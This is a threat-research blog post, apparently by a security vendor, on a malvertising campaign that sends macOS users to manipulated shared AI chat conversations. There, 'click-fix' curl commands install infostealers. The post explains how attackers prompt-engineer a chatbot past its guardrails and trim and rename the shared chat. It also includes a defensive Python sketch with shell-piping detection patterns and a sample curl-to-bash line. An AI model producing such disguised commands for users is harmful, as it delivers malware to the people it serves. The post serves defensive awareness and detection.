From Troubleshooting to Takeover: When the AI Chat Is the Attack


The most dangerous attacks don't look dangerous at all.

They can look like a Google search. They can look like an AI giving helpful advice on how to fix your slow Mac.

This is a story about how attackers are turning your everyday troubleshooting habits against you, and why the tools you trust most are becoming their most effective weapons.

Executive Summary

Daylight has identified an active malvertising campaign targeting macOS users through manipulated search engine ads.

Threat actors are leveraging both compromised Google Ads accounts and their own paid accounts to promote sponsored results tied to common macOS troubleshooting queries, including storage management, hidden files, external drive issues, audio problems, and performance issues.



What makes this campaign particularly deceptive is the deliberate abuse of trusted AI chat platforms. Victims are redirected to maliciously crafted shared conversation links hosted on platforms such as Kimi.com and Use.ai, where threat actors exploit platform features, such as selective conversation sharing and re-nameable chat titles, to manipulate the appearance of AI-generated responses.

By omitting context and impersonating authoritative sources (e.g., renaming chats to "Generated by Apple"), threat actors weaponize the inherent trust users place in these platforms to make malicious instructions appear legitimate.

These engineered conversations are designed to trick users into copy-pasting malicious curl commands into their terminals ("click-fix" style), ultimately resulting in infostealer malware execution on the endpoint.

Troubleshooting Commands to Infostealer Execution

Daylight is actively monitoring this attack vector, in which search advertisements aimed at users of a specific operating system promote maliciously crafted content hosted on AI chat platforms.

In a recent investigation, Daylight observed alerts from a client environment in which malicious binaries were being downloaded and executed on endpoints. Tracing the process back, we found that the attack sequence began with the execution of an obfuscated bash command.
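The exact command from the investigation is not reproduced here. As a rough illustration of what a paste-and-run one-liner can look like to a defender, the sketch below flags a few common shapes: a download piped straight into a shell, a base64 blob decoded into a shell, and a download inside a command substitution. The function name, pattern list, and labels are assumptions made for this example rather than Daylight's detection logic, and the sample hosts use the reserved `.invalid` TLD.

```python
import re

# Illustrative heuristics only (assumed for this sketch, not an exhaustive
# or production-grade rule set).
RISKY_PATTERNS = [
    ("download piped to shell",
     re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("base64 decode piped to shell",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("download inside command substitution",
     re.compile(r"\$\(\s*(?:curl|wget)\b")),
]


def flag_risky_command(command: str) -> list[str]:
    """Return the label of every heuristic that matches the command line."""
    return [label for label, pattern in RISKY_PATTERNS if pattern.search(command)]


if __name__ == "__main__":
    samples = [
        "ls -la ~/Library",
        "curl -fsSL https://example.invalid/install.sh | bash",
        "echo ZWNobyBoaQ== | base64 -D | bash",
    ]
    for sample in samples:
        print(sample, "->", flag_risky_command(sample))
```

Heuristics like these will miss many variants and can also match legitimate installers, so they are better suited to prompting a closer look than to blocking outright.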

How the Ads Are Weaponized

Search queries about specific OS operations return advertisements that lead to legitimate AI chat platforms. There, a shared conversation history instructs the user to copy and paste malicious curl commands (“click-fix” style), resulting in the execution of infostealer malware.


Reviewing paid advertisements in the Google Ads Transparency Center, we observed the following macOS troubleshooting themes being targeted:

- Storage management

- Viewing hidden files

- External drive problems

- Audio problems

- Performance issues


We also observed that the advertisers promoting the malicious instructions include compromised Google Ads accounts. Bitdefender (https://www.bitdefender.com/en-us/blog/hotforsecurity/hijacked-google-ads-push-fake-7-zip-notepad-and-office-downloads-to-mac-users-via-evernote-pages) made the same observation in a campaign where advertisements for Mac software were used to push infostealers via Evernote pages. Daylight has likewise observed Evernote pages being used to deliver the malicious instructions.


How Attackers Manipulate AI Conversations

Attackers abuse trusted AI brands, and shared conversation history links can be manipulated to look legitimate.

When the user clicks on one of these malvertised links, they are presented with a shared conversation hosted on a legitimate AI chat platform.

The threat actor first starts a conversation with the LLM for troubleshooting and then performs prompt engineering to elicit a malicious instruction response from the LLM.

From what we’ve observed, only certain platforms, such as Kimi.com, allow selective conversation sharing: when you share a chat, you can choose which messages to omit. It has previously been reported that Claude Artifacts have been abused in a similar way by threat actors to deliver malicious instructions.


Threat actors can abuse selective sharing to manipulate the conversation by omitting the surrounding context. A typical sequence looks like this:

1. The threat actor asks a benign question, such as “How to list hidden files in macOS”.

2. The LLM replies with correct instructions.

3. The threat actor asks a follow-up question that results in the AI giving malicious instructions. This requires some prompt engineering, as most LLMs have guardrails against generating malicious content.

4. The LLM replies with the malicious commands embedded.

When configuring the shared conversation, the threat actor can deselect the benign response and the engineered follow-up prompt (2 and 3) and share only the benign question and the malicious response (1 and 4). The malicious response then appears directly after the benign question, which makes it look like the LLM's legitimate answer.
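The effect of sharing only messages 1 and 4 can be modeled with a toy example. This is a sketch of the idea only: the `Message` type, the `shared_view` function, and the placeholder texts are assumptions for illustration and do not reflect how Kimi.com or any other platform implements sharing.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Message:
    number: int  # position in the original conversation
    role: str    # "user" or "assistant"
    text: str


def shared_view(conversation: list[Message], selected: set[int]) -> list[Message]:
    """Return only the selected messages, in their original order."""
    return [message for message in conversation if message.number in selected]


# Placeholder texts; no real prompt or command is reproduced here.
conversation = [
    Message(1, "user", "How to list hidden files in macOS"),
    Message(2, "assistant", "<correct, benign instructions>"),
    Message(3, "user", "<engineered follow-up prompt>"),
    Message(4, "assistant", "<reply with the attacker's command embedded>"),
]

# Deselecting 2 and 3 leaves a view where the malicious reply appears to
# answer the benign question directly.
view = shared_view(conversation, {1, 4})
for message in view:
    print(f"{message.role}: {message.text}")
```

A reader of the shared link sees a single question followed by a single answer and has no indication that two messages were left out.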


The title of the chat conversation can also be renamed to something authoritative. When the conversation is shared, the title appears at the top of the page, lending further credibility to the guise.

In our own test chat, we named the conversation “Totally Legit”. A threat actor could just as easily rename their chat to “Generated by OpenAI” to make it appear legitimate.


In one manipulated chat conversation observed in the wild, the threat actor renamed the chat to “Generated by Apple” to give the impression that it was an authoritative reply.


Now all the threat actor has to do is advertise the chat conversation link against the targeted troubleshooting themes, so that when a victim's search matches certain keywords, the manipulated conversation is promoted to them.

Daylight observed that the macOS-targeted themes lead to macOS-specific infostealers such as macSync, AMOS, and Banshee.

Protecting Your Organization

We recommend educating employees to be discerning and exercise caution when using search engines during troubleshooting.

- Recognize that shared LLM chats and artifacts can be manipulated to present a false narrative, either via prompt engineering to elicit malicious responses, or selective context sharing, and should not be blindly trusted.

- Treat sponsored search results with the same skepticism you'd apply to a cold email. Just because a result appears at the top doesn't mean it's trustworthy.

- Train employees never to execute terminal commands from the internet without first understanding what they do, regardless of how authoritative the source appears.

The Bigger Picture

This campaign represents a sophisticated abuse of both trusted platforms, such as Google, and everyday user habits. By using Google Ads to deliver malicious instructions through legitimate AI chat interfaces, and by exploiting selective conversation sharing to manipulate perceived context, threat actors have created a highly convincing social engineering chain that is difficult for the average user to identify as malicious.

Daylight recommends that organizations prioritize user awareness training around sponsored search results and the dangers of executing terminal commands sourced from the internet, regardless of how authoritative the source may appear.